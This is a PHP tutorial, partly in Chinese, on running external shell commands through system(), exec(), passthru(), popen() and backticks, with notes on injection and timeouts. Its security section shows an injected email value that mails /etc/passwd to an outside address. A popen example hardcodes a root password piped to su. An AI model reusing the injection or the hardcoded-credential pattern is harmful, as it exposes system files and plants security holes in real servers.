PHP, as a server-side scripting language, is fully capable of tasks such as writing simple or complex dynamic web pages. But this is not always the case. Sometimes in order to implement a certain function, you must resort to external programs (or commands) of the operating system, so that you can get twice the result with half the effort.
So, is it possible to call external commands in PHP scripts? If so, how to do it? What are your concerns? I believe that after reading this article, you will definitely be able to answer these questions.
Is it possible?
The answer is yes. PHP, like other programming languages, can call external commands within the program, and it is very simple: just use one or a few functions.
Prerequisites
Since PHP is basically used for WEB program development, security has become an important aspect that people consider. So PHP designers added a door to PHP: safe mode. If running in safe mode, the PHP script will be subject to the following four restrictions:
Execution of external commands
Some restrictions when opening files
Connecting to MySQL database
HTTP-based authentication
In safe mode , only external programs in a specific directory can be executed, and calls to other programs will be denied. This directory can be specified using the safe_mode_exec_dir directive in the php.ini file, or by adding the --with-exec-dir option when compiling PHP. The default is /usr/local/php/bin.
If you call an external command that should be able to output results (meaning that the PHP script has no errors), but you get a blank, then it is likely that your network administrator has run PHP in safe mode.
How to do it?
Calling external commands in PHP can be implemented in the following three methods:
1) Use the special functions provided by PHP
PHP provides a total of 3 special functions for executing external commands: system (), exec ( ), passthru().
system()
Prototype: string system (string command [, int return_var])
system() function is similar to that in other languages. It executes the given command, outputs and returns the result. The second parameter is optional and is used to get the status code after the command is executed.
Example:
<?system("/usr/local/bin/webalizer/webalizer");?> exec()
Prototype: string exec (string command [, string array [, int return_var]])
The exec() function is similar to system(), and also executes the given command, but does not output the results, but is the last row of the returned result. Although it only returns the last line of the command result, using the second parameter array can get the complete result by appending the results line by line to the end of the array. So if the array is not empty, it is best to use unset() to clear it before calling it. Only when the second parameter is specified, the third parameter can be used to obtain the status code of command execution.
Example:
<? exec("/bin/ls -l"); exec("/bin/ls -l", $res); #$res是一个数据,每个元素代表结果的一行 exec("/bin/ls -l", $res, $rc); #$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0 ?>
passthru()
Prototype: void passthru (string command [, int return_var])
passthru() only calls the command and does not return any results, but outputs the running results of the command directly to on the standard output device. Therefore, the passthru() function is often used to call programs like pbmplus (a tool for processing images under Unix that outputs a binary stream of original images). It can also get the status code of command execution.
Example:
<? header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?>
2) Use the popen() function to open the process
The above method can only simply execute the command, but cannot interact with the command. But sometimes you must enter something into the command. For example, when adding a Linux system user, you need to call su to change the current user to root, and the su command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above. The
popen() function opens a process pipe to execute the given command, returning a file handle. Since a file handle is returned, you can read and write to it. In PHP3, this kind of handle can only be used in a single operation mode, either writing or reading; starting from PHP4, it is possible to read and write at the same time. Unless the handle was opened in one mode (read or write), the pclose() function must be called to close it.
Example 1:
<? $fp=popen("/bin/ls -l", "r"); ?>
Example 2 (this example comes from the PHP China Alliance website http://www.phpx.com/show.php?d=col&i=51):
/* in PHP How to add a system user
The following is a routine to add a user named james.
The root password is very good. For reference only
*/ $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s \"%s %s\"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?>
3) Use a backtick (`, which is the one under the ESC key on the keyboard, and above the same one as ~)
This method has not been included in the PHP documentation before, and it exists as a secret technique . The method is very simple. Use two backticks to enclose the command to be executed as an expression. The value of this expression is the result of the command execution. For example:
<? $res=`/bin/ls -l`; echo '<b><pre class="brush:php;toolbar:false">'.$res.''; ?>
The output of this script is like:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
What should I consider?
Two issues to consider: security and timeout.
先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:
<? system("mail $to < products.txt"); echo "我们的产品目录已经发送到你的信箱:$to"; ?>
用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
那么这条命令最终变成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。
幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:
<? system("/usr/local/bin/order_proc > /tmp/null &"); ?>
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
